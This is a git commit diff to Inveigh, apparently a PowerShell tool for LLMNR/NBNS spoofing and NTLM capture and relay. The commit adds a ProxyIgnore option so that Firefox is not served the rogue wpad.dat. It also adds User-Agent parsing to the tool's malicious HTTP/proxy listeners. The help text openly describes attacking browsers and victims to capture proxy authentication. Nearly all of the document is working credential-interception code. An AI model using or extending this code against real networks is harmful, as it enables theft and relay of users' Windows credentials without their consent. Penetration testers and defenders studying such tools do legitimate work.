Added Firefox blocking for proxy auth

Added ProxyIgnore parameter for controlling browser user agents string
that get blocked from the proxy auth process. Firefox is listed by
default since it doesn't play nice with the proxy failover.

2 files changed, 108 insertions, 41 deletions

diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
index 08a3f3d..7a0e1d4 100644
--- a/Scripts/Inveigh-Relay.ps1
+++ b/Scripts/Inveigh-Relay.ps1
@@ -70,6 +70,14 @@ Default = Any: IP address for the proxy listener.
 .PARAMETER ProxyPort
 Default = 8182: TCP port for the proxy listener.
 
+.PARAMETER ProxyIgnore
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly
+with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is
+cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting
+-SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by
+closing and reopening.
+
 .PARAMETER Usernames
 Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and
 domain\username format. 
@@ -149,6 +157,7 @@ param
     [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
     [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "",
     [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
+    [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
     [parameter(Mandatory=$false)][Array]$Usernames = "",
     [parameter(Mandatory=$false)][Int]$HTTPPort = "80",
     [parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
@@ -453,6 +462,13 @@ if($Proxy -eq 'Y')
     $inveigh.status_queue.Add("Proxy Capture/Relay = Enabled")  > $null
     $ProxyPortFailover = $ProxyPort + 1
     $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $ProxyIP`:$ProxyPort; PROXY $ProxyIP`:$ProxyPortFailover; DIRECT`";}"
+    $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
+
+    if($ProxyIgnore.Count -gt 0)
+    {
+        $inveigh.status_queue.Add("Proxy Ignored User Agents = " + ($ProxyIgnore -join ","))  > $null
+    }
+
 }
 
 $inveigh.status_queue.Add("Relay Target = $Target") > $null
@@ -2514,7 +2530,7 @@ $SMB_relay_response_scriptblock =
 # HTTP/HTTPS Server ScriptBlock
 $HTTP_scriptblock = 
 { 
-    param ($Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPS_listener,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$Target,$WPADAuth,$WPADResponse)
+    param ($Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPS_listener,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$Target,$WPADAuth,$WPADResponse)
 
     function NTLMChallengeBase64
     {
@@ -2732,6 +2748,24 @@ $HTTP_scriptblock =
             {
                 $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
                 $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")])
+
+                if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
+                {
+                    $HTTP_user_agent = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 36)
+                    $HTTP_user_agent = $HTTP_user_agent.Substring(0,$HTTP_user_agent.IndexOf("-0D-0A-"))
+                    $HTTP_user_agent = $HTTP_user_agent.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                    $user_agent = New-Object System.String ($HTTP_user_agent,0,$HTTP_user_agent.Length)
+                    $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $user_agent from $HTTP_source_IP")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $user_agent from $HTTP_source_IP")])
+
+                    if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$user_agent.contains($_)}))
+                    {
+                        $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")])
+                    }
+
+                }
+
             }
         
             if($authentication_header.startswith('NTLM '))
@@ -3023,7 +3057,7 @@ $HTTP_scriptblock =
 
             }
 
-            if(!$proxy_listener -and $WPADResponse -and $HTTP_request_raw_URL -match '/wpad.dat' -and [System.BitConverter]::ToString($HTTP_response_status_code) -eq "32-30-30")
+            if(!$proxy_listener -and $WPADResponse -and $HTTP_request_raw_URL -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | ForEach-Object{$user_agent.contains($_)})))
             {
                 $HTTP_message = $WPADResponse
                 $HTTP_content_type_header = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig") + 0x0d,0x0a
@@ -3251,9 +3285,9 @@ function HTTPListener()
     $HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
     $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
     $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
-        $HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPS_listener).AddArgument($proxy_listener).AddArgument(
-        $RelayAutoDisable).AddArgument($Service).AddArgument($SMB_version).AddArgument($Target).AddArgument(
-        $WPADAuth).AddArgument($WPADResponse) > $null
+        $HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
+        $proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument(
+        $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
     $HTTP_powershell.BeginInvoke() > $null
 }
 
@@ -3276,9 +3310,9 @@ function HTTPSListener()
     $HTTPS_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
     $HTTPS_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
     $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
-        $HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPS_listener).AddArgument($proxy_listener).AddArgument(
-        $RelayAutoDisable).AddArgument($Service).AddArgument($SMB_version).AddArgument($Target).AddArgument(
-        $WPADAuth).AddArgument($WPADResponse) > $null
+        $HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
+        $proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument(
+        $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
     $HTTPS_powershell.BeginInvoke() > $null
 }
 
@@ -3301,9 +3335,9 @@ function ProxyListener()
     $proxy_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
     $proxy_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
     $proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
-        $ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPS_listener).AddArgument($proxy_listener).AddArgument(
-        $RelayAutoDisable).AddArgument($Service).AddArgument($SMB_version).AddArgument($Target).AddArgument(
-        $WPADAuth).AddArgument($WPADResponse) > $null
+        $ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
+        $proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument(
+        $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
     $proxy_powershell.BeginInvoke() > $null
 }
 
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1
index e0dd56a..ce7020a 100644
--- a/Scripts/Inveigh.ps1
+++ b/Scripts/Inveigh.ps1
@@ -16,6 +16,10 @@ Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following fea
     Run time and run count control
     LLMNR/NBNS spoofer learning mode
 
+.PARAMETER ElevatedPrivilege
+Default = Auto: (Auto,Y,N) Set the privilege mode. Auto will determine if Inveigh is running with
+elevated privilege. If so, options that require elevated privilege can be used. 
+
 .PARAMETER IP
 Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the
 SpooferIP parameter is not set.
@@ -170,6 +174,14 @@ Default = Any: IP address for the proxy listener.
 .PARAMETER ProxyPort
 Default = 8492: TCP port for the proxy listener.
 
+.PARAMETER ProxyIgnore
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly
+with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is
+cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting
+-SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by
+closing and reopening. 
+
 .PARAMETER SMB
 Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still
 direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to
@@ -317,6 +329,7 @@ param
     [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "",
     [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "",
     [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
+    [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
     [parameter(Mandatory=$false)][Array]$SpooferHostsReply = "",
     [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "",
     [parameter(Mandatory=$false)][Array]$SpooferIPsReply = "",
@@ -515,6 +528,8 @@ if(!$elevated_privilege)
         throw
     }
 
+    $SMB = "N"
+
 }
 
 $inveigh.running = $true
@@ -823,14 +838,7 @@ if($HTTPS -eq 'Y')
                 $inveigh.status_queue.Add("HTTPS Capture = Using Existing Certificate")  > $null
             }
             
-            #$certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
-            #$netsh_certhash = "certhash=" + $certificate_check.thumbprint
-            #$netsh_app_ID = "appid={00112233-4455-6677-8899-AABBCCDDEEFF}"
-            #$netsh_arguments = @("http","add","sslcert","ipport=$HTTPIP`:$HTTPSPort",$netsh_certhash,$netsh_app_ID)
-            #& "netsh" $netsh_arguments > $null
             $inveigh.HTTPS = $true
-            #$inveigh.HTTPS_IP = $HTTPIP
-            #$inveigh.HTTPS_port = $HTTPSPort
 
             if($HTTPIP -ne '0.0.0.0')
             { 
@@ -892,25 +900,17 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
         $inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm")  > $null
     }
 
-    if($WPADDirectHosts)
-    {
-        ForEach($WPAD_direct_host in $WPADDirectHosts)
-        {
-            $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";'
-        }
-
-        $inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ","))  > $null
-    }
-
-    if($WPADResponse)
-    {
-        $inveigh.status_queue.Add("WPAD Custom Response = Enabled")  > $null
-    }
-    elseif($Proxy -eq 'Y')
+    if($Proxy -eq 'Y')
     {
         $inveigh.status_queue.Add("Proxy Capture = Enabled")  > $null
         $inveigh.status_queue.Add("Proxy Authentication = $ProxyAuth")  > $null
         $ProxyPortFailover = $ProxyPort + 1
+        $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
+
+        if($ProxyIgnore.Count -gt 0)
+        {
+            $inveigh.status_queue.Add("Proxy Ignored User Agents = " + ($ProxyIgnore -join ","))  > $null
+        }
 
         if($ProxyIP -eq '0.0.0.0')
         {
@@ -927,6 +927,21 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
         }
 
     }
+
+    if($WPADDirectHosts)
+    {
+        ForEach($WPAD_direct_host in $WPADDirectHosts)
+        {
+            $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";'
+        }
+
+        $inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ","))  > $null
+    }
+
+    if($WPADResponse)
+    {
+        $inveigh.status_queue.Add("WPAD Custom Response = Enabled")  > $null
+    }
     elseif($WPADIP -and $WPADPort)
     {
         $inveigh.status_queue.Add("WPAD Response = Enabled")  > $null
@@ -1277,7 +1292,7 @@ $SMB_NTLM_functions_scriptblock =
 # HTTP Server ScriptBlock - HTTP/HTTPS/Proxy listener
 $HTTP_scriptblock = 
 { 
-    param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$proxy_listener,$WPADAuth,$WPADResponse)
+    param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADResponse)
 
     function NTLMChallengeBase64
     {
@@ -1502,6 +1517,24 @@ $HTTP_scriptblock =
             {
                 $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
                 $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")])
+
+                if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
+                {
+                    $HTTP_user_agent = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 36)
+                    $HTTP_user_agent = $HTTP_user_agent.Substring(0,$HTTP_user_agent.IndexOf("-0D-0A-"))
+                    $HTTP_user_agent = $HTTP_user_agent.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                    $user_agent = New-Object System.String ($HTTP_user_agent,0,$HTTP_user_agent.Length)
+                    $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $user_agent from $HTTP_source_IP")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $user_agent from $HTTP_source_IP")])
+
+                    if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$user_agent.contains($_)}))
+                    {
+                        $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")])
+                    }
+
+                }
+
             }
 
             if($authentication_header.startswith('NTLM '))
@@ -1716,7 +1749,7 @@ $HTTP_scriptblock =
                 else
                 {
                 
-                    if($HTTP_request_raw_url -match '/wpad.dat')
+                    if($HTTP_request_raw_url -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | ForEach-Object{$user_agent.contains($_)})))
                     {
                         $HTTP_message = $WPADResponse
                         $HTTP_content_type_header = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig") + 0x0d,0x0a
@@ -2996,8 +3029,8 @@ function HTTPListener()
     $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
         $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument(
         $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
-        $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($proxy_listener).AddArgument(
-        $WPADAuth).AddArgument($WPADResponse) > $null
+        $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
+        $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
     $HTTP_powershell.BeginInvoke() > $null
 }
 
@@ -3017,8 +3050,8 @@ function HTTPSListener()
     $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
         $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument(
         $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
-        $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($proxy_listener).AddArgument(
-        $WPADAuth).AddArgument($WPADResponse) > $null
+        $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
+        $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
     $HTTPS_powershell.BeginInvoke() > $null
 }
 
@@ -3038,8 +3071,8 @@ function ProxyListener()
     $proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
         $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument(
         $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
-        $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($proxy_listener).AddArgument(
-        $WPADAuth).AddArgument($WPADResponse) > $null
+        $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
+        $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
     $proxy_powershell.BeginInvoke() > $null
 }